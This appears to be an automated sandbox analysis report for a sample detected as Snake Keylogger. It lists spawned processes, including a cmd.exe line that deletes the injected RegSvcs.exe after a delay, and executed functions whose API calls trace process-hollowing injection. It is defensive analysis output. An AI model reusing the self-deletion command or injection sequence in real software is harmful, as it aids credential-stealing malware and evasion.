Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:19:52
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x260000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:19:52
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x950000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.2485586490.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:19:58
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:19:58
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:19:58
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x700000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:20:15
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3552, Parent PID: 6240

General

Target ID:	20
Start time:	14:20:15
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:20:15
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x700000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	162
Total number of Limit Nodes:	5

Executed Functions

Function 07835D18 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b05c79a8faa486e51fce021e0fd6d203f767683a0dfcff51906bd241f4a4be5
Instruction ID: c4903dc0e122a90db8d0b8b3e3701ad52de32338fceb982629e7e6d7a75d7877
Opcode Fuzzy Hash: 7b05c79a8faa486e51fce021e0fd6d203f767683a0dfcff51906bd241f4a4be5
Instruction Fuzzy Hash: AC126FB4B002159FCB14DF7DC89496EBBF6BF98610B158169E906EB365DB30EC42CB90

Function 0787D7F0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573f01ce498f163dc94701d442948dd021cc2e9034533b9155688d858a2d110f
Instruction ID: 191b1be1d34f1ff0417b71d00dffaab7a9534adfb8dcce3ab87ed7f15471eb7a
Opcode Fuzzy Hash: 573f01ce498f163dc94701d442948dd021cc2e9034533b9155688d858a2d110f
Instruction Fuzzy Hash: 692238B0A00219DFCB15CF69C844BA9BBB2BF99305F1480A9E80ADB355DB35DD85CF51

Function 01943E28 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e5c44d4aa5a23c05cca35a84e23c4dc812b4081ee6b3592dce3af65d156f6f
Instruction ID: 28c9b44a16f39c168e60d6f2a8f487abf73c7bab14f33c52ebb11d4ce4d014dd
Opcode Fuzzy Hash: 72e5c44d4aa5a23c05cca35a84e23c4dc812b4081ee6b3592dce3af65d156f6f
Instruction Fuzzy Hash: 2ED1C074E00219CFEB54DFA9D984A9EBBB2FF88300F1081A9D909AB355DB759D81CF50

Function 01947019 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e674a804742822ac68473012d8ffa92139171faae04baddea8de8d4f136839b3
Instruction ID: d8fefd180c0330675d078188bc1e25b6bc40e208e0869861026613a81a591484
Opcode Fuzzy Hash: e674a804742822ac68473012d8ffa92139171faae04baddea8de8d4f136839b3
Instruction Fuzzy Hash: 02B19174E012198FEB54DFA9D984A9DBBF2FF88300F1481AAD409AB355DB31AD81CF50

Function 0194D6B0 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0194D73E
GetCurrentThread.KERNEL32 ref: 0194D77B
GetCurrentProcess.KERNEL32 ref: 0194D7B8
GetCurrentThreadId.KERNEL32 ref: 0194D811

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 786c4ea925348adaf2f3d01a81a57abee9d9afa09d7fd686a0a281b8e1e6d269
Instruction ID: 034ed5fe83987abc1062bf862a0631a2bb8f752bba5140282254a4b2973f3086
Opcode Fuzzy Hash: 786c4ea925348adaf2f3d01a81a57abee9d9afa09d7fd686a0a281b8e1e6d269
Instruction Fuzzy Hash: 525166B4900389CFEB14DFA9D988BDEBBF5EF88314F208459D509A7350DB745844CB65

Function 0194D6C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0194D73E
GetCurrentThread.KERNEL32 ref: 0194D77B
GetCurrentProcess.KERNEL32 ref: 0194D7B8
GetCurrentThreadId.KERNEL32 ref: 0194D811

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c57bc54a27e74621998dedcf404b9a60253c75fcccbb2283062ea3f6dbae59b7
Instruction ID: 2fa3a919bc526d5f44e2215d53752a33bf14dc209bc605b4f21ec8171dbdf92f
Opcode Fuzzy Hash: c57bc54a27e74621998dedcf404b9a60253c75fcccbb2283062ea3f6dbae59b7
Instruction Fuzzy Hash: 2B5166B490038ACFEB54DFA9D988BDEBBF5EF88314F208059D119A7350DB745844CB65

Function 0783BD40 Relevance: 5.4, Strings: 4, Instructions: 413
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sbpk^, xrefs: 0783BFB7
Cbpk^, xrefs: 0783C146
Sbpk^, xrefs: 0783C0AD
cbpk^, xrefs: 0783C032

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID: Cbpk^$Sbpk^$cbpk^$sbpk^
API String ID: 0-2605532789
Opcode ID: fd3ed737f5aa70f47b7edeb8e77af58738b2b745acb32a3ac0f39e6fcca0f462
Instruction ID: 8dd21ec007608cef5ac64ec78752d17b946a4df349cf657593fb1e2757d5e8f2
Opcode Fuzzy Hash: fd3ed737f5aa70f47b7edeb8e77af58738b2b745acb32a3ac0f39e6fcca0f462
Instruction Fuzzy Hash: 67E16AF0B1020A8BDB25DF6CD950A9E7BA2EF94740F508529E905EB744EF79DC058BD0

Function 078E0EB8 Relevance: 3.3, Instructions: 3304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742055ef591bc7021f374d37c26d1f0cc0d6477158af2ea53965f8dc0c7ba5c6
Instruction ID: c1afc524db248edbcea61184bdf1481fb42386c595ab7cd5c2004a5c4db97516
Opcode Fuzzy Hash: 742055ef591bc7021f374d37c26d1f0cc0d6477158af2ea53965f8dc0c7ba5c6
Instruction Fuzzy Hash: EE634DB0F40219ABEB259B60CC95BEABA73EB84700F1040D9EB097B3D0DA755E85CF55

Function 093179BC Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09317BFE

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 976662eb4c93f4458d1049596df659bcd147b16116bf6c0bd312f94878a61c5d
Instruction ID: 9d38ac3554ed670ced55e78643d0af11b02c2fa96a1bcbdb0b5746d88ea44524
Opcode Fuzzy Hash: 976662eb4c93f4458d1049596df659bcd147b16116bf6c0bd312f94878a61c5d
Instruction Fuzzy Hash: 04913C71D00219DFEB24CF68CC41BDEBBB2BF48310F188569E819A7250DB759A85CF91

Function 093179C8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09317BFE

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a8bdcb9d3e467a3fd1b3943d2b285f07dff5b74d53905d9707c7b1e8f5248942
Instruction ID: 0e2404ccd77e9d66eac398c215393f08f27235269f1b0d106653881777fa68ec
Opcode Fuzzy Hash: a8bdcb9d3e467a3fd1b3943d2b285f07dff5b74d53905d9707c7b1e8f5248942
Instruction Fuzzy Hash: AE914D71D00219DFEB24CF68C841BDEBBB2FF48310F188569E819A7250DB759A85CF91

Function 07835520 Relevance: 1.7, Strings: 1, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 07835775

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: d0f913e7abb9710b0928953e60b837732809f9b29c5d0664974ddc4d1108b8fb
Instruction ID: 8c1c92b723025b0e92247c39401754f1244b4b09efdefaff16a09bdedd0c9722
Opcode Fuzzy Hash: d0f913e7abb9710b0928953e60b837732809f9b29c5d0664974ddc4d1108b8fb
Instruction Fuzzy Hash: 400268B4600606CFD720CF29C480A6ABBF2FF88314B25C669D55ADB765DB30F856CB90

Function 0194B417 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0194B67E

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3a2104685ed2b515548777bf10e70d008da6fb08d2dd0a29d2df732d91267058
Instruction ID: 25bc71dee305776463a02e529a37c31236025f67ec0a92a33a60b6c50063b762
Opcode Fuzzy Hash: 3a2104685ed2b515548777bf10e70d008da6fb08d2dd0a29d2df732d91267058
Instruction Fuzzy Hash: 8B813570A00B058FD724DF29D485B9ABBF5FF88704F008A2ED58AD7A50DB75E845CB91

Function 019444B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 019459C9

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e28a48d17d199c13c53bf5d11e815906c1202a99653a626964d9f712be5e436f
Instruction ID: 20e283a00332d77db5ecbce7a7d48c72893fbebecd1f7c4f0731ded43ce90083
Opcode Fuzzy Hash: e28a48d17d199c13c53bf5d11e815906c1202a99653a626964d9f712be5e436f
Instruction Fuzzy Hash: AC41DFB0C0071DCBEB24CFA9C984BDEBBB5BF89704F60806AD508AB251DB756945CF90

Function 0194590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 019459C9

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 152124641b5139db1bae50e1bfe0f57183c798fd2fed26f87c218ae93f8e1b33
Instruction ID: 3e5ce2021d0a847518ee54ab2d563dcdabfb906ad9b56a767e153910ddae3b02
Opcode Fuzzy Hash: 152124641b5139db1bae50e1bfe0f57183c798fd2fed26f87c218ae93f8e1b33
Instruction Fuzzy Hash: 4441EFB0C00719CFEB25CFA9C984BDEBBB5BF89304F20816AD508AB255DB756945CF50

Function 09317738 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 093177D0

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 53b5cde71f0906b7af24dbd0619b06a8602800ddcc74598ddedeecdc01588afa
Instruction ID: 31cfa16d5dfd5017d0387a5faf9bb1e8d02dfc000e45a88286ec45d12c29c2e7
Opcode Fuzzy Hash: 53b5cde71f0906b7af24dbd0619b06a8602800ddcc74598ddedeecdc01588afa
Instruction Fuzzy Hash: B42128B69003499FDF10CFA9C885BEEBBF5FF48320F148429E919A7250D7789954CBA4

Function 09317740 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 093177D0

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a0f47c2c5289cf58cd8627978c557c430e08f658d8e6728d9a51b33a6d9c1da0
Instruction ID: 3e01dbefec3ea5699c120b3a13fcb31bc08e671367e415526dfb002df50e0d8b
Opcode Fuzzy Hash: a0f47c2c5289cf58cd8627978c557c430e08f658d8e6728d9a51b33a6d9c1da0
Instruction Fuzzy Hash: 6C2126759003499FDB10CFA9C881BEEBBF5FF48320F148429E919A7250C7789950CBA4

Function 0194D900 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0194D98F

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4e84a34fb7957896ee17212c80857942537abba77fd99f45b27a823ebc1ba82b
Instruction ID: d5a564842dac4eb82727e8036afb8eaca04e5a743cdd950812939bf83358c8eb
Opcode Fuzzy Hash: 4e84a34fb7957896ee17212c80857942537abba77fd99f45b27a823ebc1ba82b
Instruction Fuzzy Hash: 0721E3B59012499FDB10CFAAD984ADEFFF5FB48320F24841AE918A3310D378A950CF65

Function 0931716A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 093171EE

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e8799c19d84d83c4d6ddfbcf7922126df6a9cdbcdc2856af54077b4f5fe94c39
Instruction ID: 7361fc1fefa95af87d79ab6ba7fd570f0613024840707fd39c771629d46ff441
Opcode Fuzzy Hash: e8799c19d84d83c4d6ddfbcf7922126df6a9cdbcdc2856af54077b4f5fe94c39
Instruction Fuzzy Hash: D32138719003098FDB14DFAAC8857EEFBF4EF88324F14842AE519A7241CB789945CFA5

Function 09317828 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 093178B0

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: de3d06807bb05bd5e67cfb2544974655a495ad644079c62a9df279615c298870
Instruction ID: 794cdaf0fd2dc065ffc83aaca8ad234160a05a71cfcf46a7f708a697289dcdb3
Opcode Fuzzy Hash: de3d06807bb05bd5e67cfb2544974655a495ad644079c62a9df279615c298870
Instruction Fuzzy Hash: 1B2105B19003499FDB10DFAAC881BDEBBF5FF48310F14842AE519A7250D7799950CBA5

Function 09317170 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 093171EE

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c698c8281a00debd63d7df5f09e924957735274e7d36a55c6aaacec815587cee
Instruction ID: 7398106d2c0bbeafdf9f67a077757c8b207e14afe54685cb54ab53a007db689b
Opcode Fuzzy Hash: c698c8281a00debd63d7df5f09e924957735274e7d36a55c6aaacec815587cee
Instruction Fuzzy Hash: 702118719003098FDB14DFAAC8857AEBBF4EF88324F148429D519A7241DB789945CFA5

Function 09317830 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 093178B0

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7eb5841126704fc1ac6f5085d64909b7ba70b79b05bd6550febb62aed687c2d7
Instruction ID: 86fecf63225ec0ea4609ed2a1579a014fbe92c6155c33a6531dd7b7d88742d43
Opcode Fuzzy Hash: 7eb5841126704fc1ac6f5085d64909b7ba70b79b05bd6550febb62aed687c2d7
Instruction Fuzzy Hash: 992116719003499FDB10DFAAC881ADEFBF5FF48310F14842AE519A7250C7799950CBA5

Function 0194D908 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0194D98F

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 496fb167142386bea237c5cf0bd732e07a059820e0a12e52b1b0f4c3c17ce9ea
Instruction ID: ee565ffe997ad70abc7718ea16074677e12f58d45e9f438370b8167ca855e728
Opcode Fuzzy Hash: 496fb167142386bea237c5cf0bd732e07a059820e0a12e52b1b0f4c3c17ce9ea
Instruction Fuzzy Hash: 9E21E4B59002499FDB10CF9AD984ADEFFF9FB48320F14841AE918A3310D378A950CF65

Function 09317678 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 093176EE

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 35bf23b89650cc187cf6ac583eadca5ac4dc64be9dca55a51ef01865e7bc7f9d
Instruction ID: f7e1fe5c29ca87f1c310fa531670826179cd86868e4be90e7de8ef2b0be3bc18
Opcode Fuzzy Hash: 35bf23b89650cc187cf6ac583eadca5ac4dc64be9dca55a51ef01865e7bc7f9d
Instruction Fuzzy Hash: 101147729002499FDF20DFAAC845BDFBBF5EF88320F148419E515A7250C7759550CFA4

Function 09316C80 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09316CEA

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aba70766371a7f2a291195b50707881b5061c0f20f538d9fee636cf0f520cbf7
Instruction ID: f9b2343a1853da4fc6234e22b19080fe4bd6c94e9f9bb426690e212f8557096d
Opcode Fuzzy Hash: aba70766371a7f2a291195b50707881b5061c0f20f538d9fee636cf0f520cbf7
Instruction Fuzzy Hash: B21146759003498FDB20DFAAC84579FFBF4AB88624F208429D519A7240CB79A940CBA5

Function 09317680 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 093176EE

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ed11a70673c3b9eed5a073f303c655cecd79f93927c6773456ade4c0c2658ebc
Instruction ID: 5b54421a89576d9a99501a61e6c05c5c378ae1f662be3631e9f4fca91869caac
Opcode Fuzzy Hash: ed11a70673c3b9eed5a073f303c655cecd79f93927c6773456ade4c0c2658ebc
Instruction Fuzzy Hash: E01156728002499FDB20DFAAC844BDFBBF5EF88320F248419E519A7250C779A950CFA0

Function 09316C88 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09316CEA

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3b6edfd38c0ccd0050a0cf05abad40fe398d155ef0fd35797f7ff832746af9ae
Instruction ID: e91e7381759e8ed8ed19a2b1f916bb569b424cebefc25b6d1bc73eede90c601d
Opcode Fuzzy Hash: 3b6edfd38c0ccd0050a0cf05abad40fe398d155ef0fd35797f7ff832746af9ae
Instruction Fuzzy Hash: F71136B59003498FDB24DFAAC84579FFBF4EF88724F248429D519A7240CB79A940CFA5

Function 0194B618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0194B67E

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d468c83a05906a7627ce8f5fdb7d1b3a766cb383857d213ebed7e1245e0f47c5
Instruction ID: 749109e88eddc65c95a5029dd94696619af938fc88fd44600c58634b2af83821
Opcode Fuzzy Hash: d468c83a05906a7627ce8f5fdb7d1b3a766cb383857d213ebed7e1245e0f47c5
Instruction Fuzzy Hash: 6311E3B5C007498FDB20CF9AC444BDEFBF4EF88624F10842AD519A7210D379A545CFA5

Function 09315B88 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0931BA35

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 859b9bf523b6c585d79471f3082a3b33995d215d2cd97ffc4cb3aa4f185efd28
